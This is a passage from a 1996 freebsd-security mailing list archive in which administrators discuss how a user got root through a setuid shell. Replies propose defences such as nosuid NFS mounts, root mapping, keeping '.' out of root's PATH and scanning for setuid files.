X400-Received: by mta "net-tel cambridge" in "/PRMD=net-tel/ADMD=gold 400/C=gb/"; Relayed; Tue, 25 Jun 96 16:53:35 +0000
X400-Received: by "/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"; Relayed; Tue, 25 Jun 96 16:53:35 +0000
X400-MTS-Identifier: ["/PRMD=NET-TEL/ADMD=Gold 400/C=GB/";hst:17886-960625165335-70F1]
X400-Content-Type: P2-1984 (2)
X400-Originator: Andrew.Gordon@net-tel.co.uk
Original-Encoded-Information-Types: IA5-Text
X400-Recipients: non-disclosure:;
Date: Tue, 25 Jun 96 16:53:35 +0000
X400-Content-Identifier: NFS attacks (was
Message-Id: <"1847-960625165357-701E*/G=Andrew/S=Gordon/O=NET-TEL Computer Systems Ltd/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"@MHS>
To: "Jeff Aitken"
Cc: security@freebsd.org
In-Reply-To: <199606251626.MAA06583@husky.cslab.vt.edu>
Subject: NFS attacks (was: Re(4): I need help on this one - please help me track this guy down!)
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> > But what file transfer mechanism was used? NFS maybe?
> >
> > Personally, I like to mount all NFS filesystems "nosuid" - and likewise
> > for all local systems exported by NFS (I don't normally export / or
> > /usr). Most users have no business creating setuid programs in their
> > filespace, and such a policy would most likely have prevented this
> > breach even if the setuid binary was created by some other means.
>
> One thing you can do to help with this sort of problem is to map UID 0
> to some other UID. In our lab, we've got an AlphaStation which exports
> several filesystems via NFS.
> On a few administrative-type machines, we
> map UID 0 to UID 0 (so that root on any of the administrative machines
> can alter files as needed) but on the client machines (i.e., those
> machines used primarily by lab patrons) UID 0 is mapped to 'nobody' or

The mode of attack I was suggesting was untrusted machine as server,
machine-under-attack as client. Maproot wouldn't help in this case, as
it applies at the wrong end.

> somesuch. Furthermore, only system administrators have accounts on the
> servers; thus, even if someone breaks root on a client machine in the
> lab, they can't install any sort of backdoor on the server. If/when

This is good, if you can accept that limitation. On hosts where users
do have logins, maproot is only part of the answer, since quite a lot
of damage can be done by just being setuid to 'bin' (or 'news' or 'www'
according to circumstance).

Also, it sounds like in your environment you can (already do?) block NFS
traffic from outside the network of machines you control. In the
situation where the "suid shell" attack succeeded, we are given to
understand that the attacker had his own machine readily accessible over
the network - though whether NFS was involved has not yet been revealed.

From owner-freebsd-security Tue Jun 25 10:45:13 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21859 for security-outgoing; Tue, 25 Jun 1996 10:45:13 -0700 (PDT)
Received: from xmission.xmission.com (softweyr@xmission.xmission.com [198.60.22.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21847 for ; Tue, 25 Jun 1996 10:45:09 -0700 (PDT)
Received: (from softweyr@localhost) by xmission.xmission.com (8.7.5/8.7.5) id LAA24692; Tue, 25 Jun 1996 11:44:19 -0600 (MDT)
From: Barnacle Wes
Message-Id: <199606251744.LAA24692@xmission.xmission.com>
Subject: Re: The Vinnie Loophole
To: davidg@Root.COM
Date: Tue, 25 Jun 1996 11:44:19 -0600 (MDT)
Cc: hal@snitt.com, security@freebsd.org
In-Reply-To: <199606251538.IAA19357@root.com> from "David Greenman" at Jun 25, 96 08:38:29 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

% Re: Trojan horse programs that get executed because "." is in PATH
% somewhere:
%
% The fact that this well-known, easily plugged loophole is being
% rediscovered by new admins (probably daily) suggests that we *could*
% do something more proactive to keep it from happening.
%
% 1. How about adding checks for "." or equivalent in $PATH to
% /etc/security? Scan for it in .profile, .bashrc, and so forth. This
% would not catch every offence but would help.

> It's appropriate for some environments and not for others. I certainly
> wouldn't want the kernel involved in this in any case, and things that do
> scans through your filesystems need to be carefully controlled. Some systems
> have so much disk space and NFS that the scan wouldn't complete within the
> 24 hour time period. Something like (1), if implemented, should not be enabled
> by default.

I worked on the code that did this in Security Toolkit/UNIX for months,
so did the other two programmers. This is very difficult to do correctly,
and if you do it wrong, you're just giving out a false sense of security.
In my experience, when you tell someone their computer is "secure" and
then they get hacked, they get *really pissed* at you, regardless of
whether you said anything about how they got hacked or not. ;^)

--
Wes Peters | Yes I am a pirate, two hundred years too late
Softweyr | The cannons don't thunder, there's nothing to plunder
Consulting | I'm an over forty victim of fate...
softweyr@xmission.com | Jimmy Buffett

From owner-freebsd-security Tue Jun 25 11:17:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA24994 for security-outgoing; Tue, 25 Jun 1996 11:17:40 -0700 (PDT)
Received: from dns1.noc.best.net (root@dns1.noc.best.net [206.86.8.69]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA24989 for ; Tue, 25 Jun 1996 11:17:38 -0700 (PDT)
Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by dns1.noc.best.net (8.6.12/8.6.5) with ESMTP id LAA08889; Tue, 25 Jun 1996 11:17:30 -0700
Received: from edge.minimax.com (minimax.vip.best.com [205.149.169.111]) by shellx.best.com (8.6.12/8.6.5) with SMTP id LAA29401; Tue, 25 Jun 1996 11:15:35 -0700
Message-Id: <199606251815.LAA29401@shellx.best.com>
X-Sender: jasonc@best.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 25 Jun 1996 12:26:47 -0700
To: davidg@Root.COM
From: Jason Campbell
Subject: Re: The Vinnie Loophole
Cc: security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Regarding adding checks in /etc/security to scan for '.' in PATH
statements, it could be done more simply:

1. /etc/security needs to check for '.' in PATH in the config files in
   root's home dir. (but nowhere else)

2. 'su' should check for '.' in the PATH when you're becoming root and
   warn if it's there (and maybe even take it out).

Putting more code in exec() to do this sounds like a really bad idea
given how often it's called, and could break things which, for whatever
reason, intend to exec something in the current dir.

Jason.

At 08:38 AM 6/25/96 -0700, you wrote:
>>Re: Trojan horse programs that get executed because "." is in PATH
>>somewhere:
>>
>>The fact that this well-known, easily plugged loophole is being
>>rediscovered by new admins (probably daily) suggests that we *could*
>>do something more proactive to keep it from happening.
>>
>>1. How about adding checks for "." or equivalent in $PATH to
>>/etc/security? Scan for it in .profile, .bashrc, and so forth. This
>>would not catch every offence but would help.
>>
>>2. At appropriate securelevel, have exec() fail with explanation to
>>syslog if there is no "/" in argv[0]. How much code would [should]
>>this break? Is this a horrible idea?
>
> It's appropriate for some environments and not for others. I certainly
>wouldn't want the kernel involved in this in any case, and things that do
>scans through your filesystems need to be carefully controlled. Some systems
>have so much disk space and NFS that the scan wouldn't complete within the
>24 hour time period. Something like (1), if implemented, should not be enabled
>by default.
>
>-DG
>
>David Greenman
>Core-team/Principal Architect, The FreeBSD Project
>
>

From owner-freebsd-security Tue Jun 25 11:44:28 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA27715 for security-outgoing; Tue, 25 Jun 1996 11:44:28 -0700 (PDT)
Received: from husky.cslab.vt.edu (jaitken@husky.cslab.vt.edu [198.82.184.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA27708 for ; Tue, 25 Jun 1996 11:44:24 -0700 (PDT)
Received: (jaitken@localhost) by husky.cslab.vt.edu (8.6.12/8.6.4) id OAA06978; Tue, 25 Jun 1996 14:44:06 -0400
From: Jeff Aitken
Message-Id: <199606251844.OAA06978@husky.cslab.vt.edu>
Subject: Re: The Vinnie Loophole
To: softweyr@xmission.com (Barnacle Wes)
Date: Tue, 25 Jun 1996 14:44:06 -0400 (EDT)
Cc: security@freebsd.org
In-Reply-To: <199606251748.LAA25282@xmission.xmission.com> from "Barnacle Wes" at Jun 25, 96 11:48:52 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> You obviously aren't very concerned about security.

Not true at all. Perhaps I should clarify my objection: I'm aware of the
potential security risk associated with having "." in root's path. If you
want to make that impossible, so be it. I don't have it in root's path on
machines I administer in any case.

What I specifically did *not* want to see were what I consider "useless"
messages filling up the system logs. Log digestion is difficult enough as
it is, as I'm sure you (or any other good admin) are already aware.

AFAIK, FreeBSD doesn't come standard with "." in root's path. So the only
people who would suffer from this (potential) vulnerability are the ones
who *deliberately* put "." in the path! I suppose that, by the same
argument, I shouldn't care about it, since I won't ever see the message. :-)

What I really wanted to point out is that filling up system logs with lots
of (potentially) useless information is not a good idea (IMHO). I suppose
we'll just have to agree to disagree on this point.
--
Jeff Aitken
jaitken@cs.vt.edu

From owner-freebsd-security Tue Jun 25 12:53:46 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA07153 for security-outgoing; Tue, 25 Jun 1996 12:53:46 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA07133 for ; Tue, 25 Jun 1996 12:53:42 -0700 (PDT)
Received: (from jbhunt@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id MAA09401; Tue, 25 Jun 1996 12:52:24 -0700 (PDT)
Date: Tue, 25 Jun 1996 12:52:24 -0700 (PDT)
From: jbhunt
To: Mark Murray
cc: Michael Smith , -Vince- , mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606251613.SAA10099@grumble.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Mark Murray wrote:

> [hackers removed from cc: - the crosspost is getting a bit much there]
>
> jbhunt wrote:
> > Ok, this is jb. First of all this copied from here to there as root
> > didn't happen. I gave this fella an account knowing more than likely if
> > we had a hole he would find it. Unfortunately I wasn't watching his tty
> > when he actually used whatever exploit he used.
>
> Ok...
>
> > He obviously used a
> > setuid exploit so I suggest that there is a New exploit out abusing a
> > setuid program somewhere on the system because I know vince fixed the
> > mount_union and current fixed the old ypwhich hack.
>
> Not so fast. You didn't see what he did, but you are claiming suid.
> maybe, maybe not. You don't _know_.
>
> > Or actually maybe not
> > so old for some of you, but either way I did have to give him an account
> > before he could do anything. However, once inside it took him 2 minutes
> > and he was root. I know for a fact it was his FIRST look inside the
> > system and I ran no scripts from his dir.
>
> How do you know? If "." is in your path, you run a script from wherever
> you are - /tmp, /var/tmp, /var/mail if you have made that world writable
> etc. What other world writable directories do you have? what runs out
> of cron? What is automatically executed when you run emacs? vi? what
> is your EDITOR setting for vipw? Do you read your daily security report?
>
> Create a new suid file and see if it is reported the next day.
>
> > That option is out so don't
> > bother.
> > I did start watching his tty after he took root but it was too
> > late. I am open to any suggestions any of you have so far this seems to
> > be a very constructive group :>
>
> The most constructive suggestion at the moment is to look for your own
> mistakes, and be more open to them. So far it seems you (collectively)
> have made lots, but aren't admitting this - even to yourselves.
>
> Ask him what he did - maybe he'll even tell you? :-) If it is a FreeBSD
> security hole, we'll all thank him and you for finding it :-).
>
> M
> --
> Mark Murray
> 46 Harvey Rd, Claremont, Cape Town 7700, South Africa
> +27 21 61-3768 GMT+0200
> Finger mark@grondar.za for PGP key
>

Yes, I read the security reports; as I said, it hasn't been reporting any
unusual suid programs. No, he won't tell me; I already asked, of course. As
vince stated, we are remote admins; we both have to su to root, so the only
person on the actual console is chad. As for running a script, I know for
a fact that I wasn't running anything at the time. I know this guy's
methods for the most part, so I am almost sure he has some new exploit. He
also claims to have one that EVERY Linux box is vulnerable to; of course
he won't tell me or give it to me.

John
SysAdmin
Gaianet

From owner-freebsd-security Tue Jun 25 13:03:54 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA09659 for security-outgoing; Tue, 25 Jun 1996 13:03:54 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA09613; Tue, 25 Jun 1996 13:03:43 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA11159; Tue, 25 Jun 1996 13:03:06 -0700 (PDT)
Date: Tue, 25 Jun 1996 13:03:06 -0700 (PDT)
From: -Vince-
To: "Eric J. Schwertfeger"
cc: Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote:

> On Tue, 25 Jun 1996, -Vince- wrote:
>
> > Yeah, you have a point but jbhunt was watching the user as he
> > hacked root since he brought the file from his own machine.... so that
> > wasn't something the admin was tricked into doing..
>
> Then the important question is, how did he move the file so that it
> retained the setuid bit? We're already pretty sure that the program is
> only /bin/sh with the setuid bit turned on. So either he found a way to
> move the file with the bit turned on, or he found a way to turn it on,
> which requires root access.

It was a remote login so he had to transfer it over somehow...

Vince

From owner-freebsd-security Tue Jun 25 13:15:20 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA11670 for security-outgoing; Tue, 25 Jun 1996 13:15:20 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA11652 for ; Tue, 25 Jun 1996 13:15:14 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA13032; Tue, 25 Jun 1996 13:14:43 -0700 (PDT)
Date: Tue, 25 Jun 1996 13:14:42 -0700 (PDT)
From: -Vince-
To: mark thompson
cc: hackers@freefall.freebsd.org, Chad Shackley , jbhunt , security@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606251403.HAA15335@squirrel.tgsoft.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, mark thompson wrote:

> It seems that -Vince- said:
> >
> > On Tue, 25 Jun 1996, Don Yuniskis wrote:
> >
> > > It seems that -Vince- said:
> > > > Hmmm, that's only if we had phone support.... We don't :) but do
> > > > admins really go run a program that the user said won't run?
> > >
> > > Well, it *appears* that one of *you* did! :>
> >
> > Well, jbhunt was the one who gave the user the account and the
> > user just transferred the root which is /bin/sh with setuid and ran it
> > and he got root....
>
> Once upon a time, one of our nice users brought in a tape he wanted
> read. One of the guys logged in as root, hung the tape and untarred it
> into the nice user's directory.
>
> The tape contained a shell that was setuid root... but we didn't
> discover that 'till later.
>
> Seems this guy didn't want to *break* anything, but just wanted to admin
> the machine himself, being dissatisfied with us. Anyway, I learned
> several valuable lessons:
>
> 1) Scan the machine for setuid programs. Often.
>
> 2) Read user's tapes when logged in as the user.
>
> 3) If you are running a computer system, trust nobody.

This is very true....
Vince

From owner-freebsd-security Tue Jun 25 13:27:49 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA14233 for security-outgoing; Tue, 25 Jun 1996 13:27:49 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA14202 for ; Tue, 25 Jun 1996 13:27:39 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA15269; Tue, 25 Jun 1996 13:27:02 -0700 (PDT)
Date: Tue, 25 Jun 1996 13:27:02 -0700 (PDT)
From: -Vince-
To: Andrew.Gordon@net-tel.co.uk
cc: security@freebsd.org, jbhunt , Chad Shackley
Subject: Re: Re(2): I need help on this one - please help me track this guy down!
In-Reply-To: <"811-960625150230-D047*/G=Andrew/S=Gordon/O=NET-TEL Computer Systems Ltd/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"@MHS>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996 Andrew.Gordon@net-tel.co.uk wrote:

> > -Vince- stands accused of saying:
> > >
> > > Yeah, you have a point but jbhunt was watching the user as he
> > > hacked root since he brought the file from his own machine.... so that
> > > wasn't something the admin was tricked into doing..
>
> But what file transfer mechanism was used? NFS maybe?
>
> Certainly a simple NFS mount of an untrusted machine is a dangerous thing
> to do, since setuids on those files will be obeyed. Maybe you allow this
> via an incautious AMD map?
>
> Personally, I like to mount all NFS filesystems "nosuid" - and likewise
> for all local systems exported by NFS (I don't normally export / or /usr).
> Most users have no business creating setuid programs in their filespace,
> and such a policy would most likely have prevented this breach even if
> the setuid binary was created by some other means.

Probably ftp using a compressed tar or gzipped tar binary...

Vince

From owner-freebsd-security Tue Jun 25 13:29:19 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA14619 for security-outgoing; Tue, 25 Jun 1996 13:29:19 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA14569; Tue, 25 Jun 1996 13:29:07 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA15405; Tue, 25 Jun 1996 13:28:02 -0700 (PDT)
Date: Tue, 25 Jun 1996 13:28:02 -0700 (PDT)
From: -Vince-
To: torstenb@tlk.com
cc: Gary Palmer , security@freebsd.org, Chad Shackley , jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Torsten Blum wrote:

> Gary Palmer wrote:
>
> > [ CC: Trimmed ]
> >
> > > Yeah, that's the real question is like if he can transfer the
> > > binary from another machine and have it work... other people can do the
> > > same thing and gain access to FreeBSD boxes as root as long as they have
> > > a account on that machine...
> >
> > Sort of. You need root access in the first place to create a suid root
> > shell... It could be an old exploit that is now closed (like the
> > mount_union loophole)...
>
> Or the telnetd environment hole - it was possible to become root via telnet
> without an account on the target machine.

What was the telnetd hole?

Vince

From owner-freebsd-security Tue Jun 25 13:31:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA15195 for security-outgoing; Tue, 25 Jun 1996 13:31:40 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA15184 for ; Tue, 25 Jun 1996 13:31:37 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA15936; Tue, 25 Jun 1996 13:31:04 -0700 (PDT)
Date: Tue, 25 Jun 1996 13:31:04 -0700 (PDT)
From: -Vince-
To: Arlen Fletcher
cc: security@freebsd.org, jbhunt , Chad Shackley
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606251653.JAA09261@mugwump.paccar.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Arlen Fletcher wrote:

> At 08:43 AM 6/25/96 -0700, you wrote:
> >On Tue, 25 Jun 1996, Michael Smith wrote:
> >
> > [snip]
> >
> >Ok, this is jb. First of all this copied from here to there as root
> >didn't happen. I gave this fella an account knowing more than likely if
> >we had a hole he would find it. Unfortunately I wasn't watching his tty
> >when he actually used whatever exploit he used. He obviously used a
> >setuid exploit so I suggest that there is a New exploit out abusing a
> >setuid program somewhere on the system because I know vince fixed the
> >mount_union and current fixed the old ypwhich hack. Or actually maybe not
> >so old for some of you, but either way I did have to give him an account
> >before he could do anything. However, once inside it took him 2 minutes
> >and he was root. I know for a fact it was his FIRST look inside the
>
> Did you by any chance check the history file? I presume he vaporized it,
> but you never know....

I did but he didn't have a history file..

> Of course it's 20/20 hindsight, but copying the history file somewhere
> else when you see a user doing something bizarre (like becoming root)
> might be worth thinking about in the future.

Yeah, I always check the history file...
Vince

From owner-freebsd-security Tue Jun 25 13:39:43 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA16566 for security-outgoing; Tue, 25 Jun 1996 13:39:43 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA16548 for ; Tue, 25 Jun 1996 13:39:39 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA17828; Tue, 25 Jun 1996 13:39:04 -0700 (PDT)
Date: Tue, 25 Jun 1996 13:39:04 -0700 (PDT)
From: -Vince-
To: jbhunt
cc: Mark Murray , Michael Smith , mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, jbhunt wrote:

> On Tue, 25 Jun 1996, Mark Murray wrote:
>
> > [hackers removed from cc: - the crosspost is getting a bit much there]
> >
> > jbhunt wrote:
> > > Ok, this is jb. First of all this copied from here to there as root
> > > didn't happen. I gave this fella an account knowing more than likely if
> > > we had a hole he would find it. Unfortunately I wasn't watching his tty
> > > when he actually used whatever exploit he used.
> >
> > Ok...
> >
> > > He obviously used a
> > > setuid exploit so I suggest that there is a New exploit out abusing a
> > > setuid program somewhere on the system because I know vince fixed the
> > > mount_union and current fixed the old ypwhich hack.
> >
> > Not so fast. You didn't see what he did, but you are claiming suid.
> > maybe, maybe not. You don't _know_.
> >
> > > Or actually maybe not
> > > so old for some of you, but either way I did have to give him an account
> > > before he could do anything. However, once inside it took him 2 minutes
> > > and he was root. I know for a fact it was his FIRST look inside the
> > > system and I ran no scripts from his dir.
> >
> > How do you know? If "." is in your path, you run a script from wherever
> > you are - /tmp, /var/tmp, /var/mail if you have made that world writable
> > etc. What other world writable directories do you have? what runs out
> > of cron? What is automatically executed when you run emacs? vi? what
> > is your EDITOR setting for vipw? Do you read your daily security report?

the directories world writable are /tmp and /var/tmp.... /var/mail isn't.
nothing runs out of cron since we don't allow crontabs from anyone other
than root. We don't have emacs installed and vi just runs /usr/bin/vi.
vipw is using vi... and we do read our daily security report...

> > Create a new suid file and see if it is reported the next day.
> >
> > > That option is out so don't
> > > bother. I did start watching his tty after he took root but it was too
> > > late. I am open to any suggestions any of you have so far this seems to
> > > be a very constructive group :>
> >
> > The most constructive suggestion at the moment is to look for your own
> > mistakes, and be more open to them. So far it seems you (collectively)
> > have made lots, but aren't admitting this - even to yourselves.
> >
> > Ask him what he did - maybe he'll even tell you? :-) If it is a FreeBSD
> > security hole, we'll all thank him and you for finding it :-).
> >
> Yes I read the security reports as I said it hasn't been reporting any
> unusual suid programs. No, he won't tell me I already asked of course. As
> vince stated we are remote admins we both have to su to root so the only
> person on the actual console is chad. As for running a script I know for
> a fact that I wasn't running anything at the time. I know this guy's
> methods for the most part so I am almost sure he has some new exploit. He
> also claims to have one that EVERY Linux box is vulnerable to of course
> he won't tell me or give it to me.
Vince

From owner-freebsd-security Tue Jun 25 14:29:52 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA22844 for security-outgoing; Tue, 25 Jun 1996 14:29:52 -0700 (PDT)
Received: from gallup.cia-g.com (root@gallup.cia-g.com [206.206.162.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id OAA22838 for ; Tue, 25 Jun 1996 14:29:50 -0700 (PDT)
Received: from gallup.cia-g.com (gallup.cia-g.com [206.206.162.10]) by gallup.cia-g.com (8.6.11/8.6.9) with SMTP id PAA25852 for ; Tue, 25 Jun 1996 15:31:07 -0600
Date: Tue, 25 Jun 1996 15:31:07 -0600 (MDT)
From: Stephen Fisher
To: freebsd-security@freebsd.org
Subject: List of freebsd security advisories?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello,

Anyone have an archive of the FreeBSD security advisories? I'd like to be
able to fix the problems on newly installed 2.1R systems.

- Steve -
Systems Manager - Community Internet Access - http://www.cia-g.com

From owner-freebsd-security Tue Jun 25 17:20:48 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA12631 for security-outgoing; Tue, 25 Jun 1996 17:20:48 -0700 (PDT)
Received: (from jmb@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA12620; Tue, 25 Jun 1996 17:20:45 -0700 (PDT)
From: "Jonathan M. Bresler"
Message-Id: <199606260020.RAA12620@freefall.freebsd.org>
Subject: Re: I need help on this one - please help me track this guy down!
To: jbhunt@mercury.gaianet.net (jbhunt)
Date: Tue, 25 Jun 1996 17:20:45 -0700 (PDT)
Cc: mark@grumble.grondar.za, msmith@atrad.adelaide.edu.au, vince@mercury.gaianet.net, mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net
In-Reply-To: from "jbhunt" at Jun 25, 96 12:52:24 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

jbhunt wrote:
>
> Yes I read the security reports as I said it hasn't been reporting any
> unusual suid programs. No, he won't tell me I already asked of course. As
> vince stated we are remote admins we both have to su to root so the only
> person on the actual console is chad. As for running a script I know for

could be a new one or could be a moldy old one.

you have to su to root on a remote computer. how do you get access to
the remote machine? telnet? serial line? encrypted? or in the clear?

> a fact that I wasn't running anything at the time. I know this guy's
> methods for the most part so I am almost sure he has some new exploit. He
> also claims to have one that EVERY Linux box is vulnerable to of course
> he won't tell me or give it to me.

jmb
--
Jonathan M. Bresler FreeBSD Postmaster jmb@FreeBSD.ORG
FreeBSD--4.4BSD Unix for PC clones, source included.
http://www.freebsd.org/
PGP 2.6.2 Fingerprint: 31 57 41 56 06 C1 40 13 C5 1C E3 E5 DC 62 0E FB

From owner-freebsd-security Tue Jun 25 17:38:24 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA14510 for security-outgoing; Tue, 25 Jun 1996 17:38:24 -0700 (PDT)
Received: (from jmb@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA14485; Tue, 25 Jun 1996 17:38:21 -0700 (PDT)
From: "Jonathan M. Bresler"
Message-Id: <199606260038.RAA14485@freefall.freebsd.org>
Subject: FreeBSD-security-digest NEW mailing list
To: freebsd-announce
Date: Tue, 25 Jun 1996 17:38:20 -0700 (PDT)
Cc: freebsd-security
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

freebsd-security-digest is a new mailing list available from FreeBSD.org

to subscribe send mail to majordomo@freebsd.org containing the single line:

	"subscribe freebsd-security-digest"

this digest will contain all the messages mailed to freebsd-security.
the messages will be collected together and sent out as a single mailing
on a semi-periodic basis (size and time are the criteria).

issues of the digest will be archived at FreeBSD.org. the archives are
available thru majordomo. send mail to majordomo@freebsd.org containing
the single line:

	"index freebsd-security-digest"

to get a list of archived issues. individual issues can be retrieved by
volume and issue number using majordomo. send mail to majordomo@freebsd.org
containing the single line:

	"get freebsd-security-digest "

FREEBSD-SECURITY-DIGEST	Security matters
	This is the digest version of the freebsd-security mailing list.
	The digest consists of all messages sent to freebsd-security
	bundled together and mailed out as a single message.

information on freebsd-security:
	FreeBSD computer security issues (DES, Kerberos, known security
	holes and fixes, etc).

jmb
--
Jonathan M. Bresler FreeBSD Postmaster jmb@FreeBSD.ORG
FreeBSD--4.4BSD Unix for PC clones, source included.
http://www.freebsd.org/
PGP 2.6.2 Fingerprint: 31 57 41 56 06 C1 40 13 C5 1C E3 E5 DC 62 0E FB

From owner-freebsd-security Tue Jun 25 19:49:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA27886 for security-outgoing; Tue, 25 Jun 1996 19:49:50 -0700 (PDT)
Received: from unix.stylo.it (unix.stylo.it [193.76.98.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA27856; Tue, 25 Jun 1996 19:49:36 -0700 (PDT)
Received: from styloserver.stylo.it (trust.stylo.it [194.21.207.253]) by unix.stylo.it (8.7.5/8.6.9) with SMTP id EAA04245; Wed, 26 Jun 1996 04:49:18 +0200 (MET DST)
Received: by styloserver.stylo.it with Microsoft Exchange (IMC 4.12.736) id <01BB631A.F0990400@styloserver.stylo.it>; Wed, 26 Jun 1996 04:50:03 +0200
Message-ID:
From: Angelo Turetta
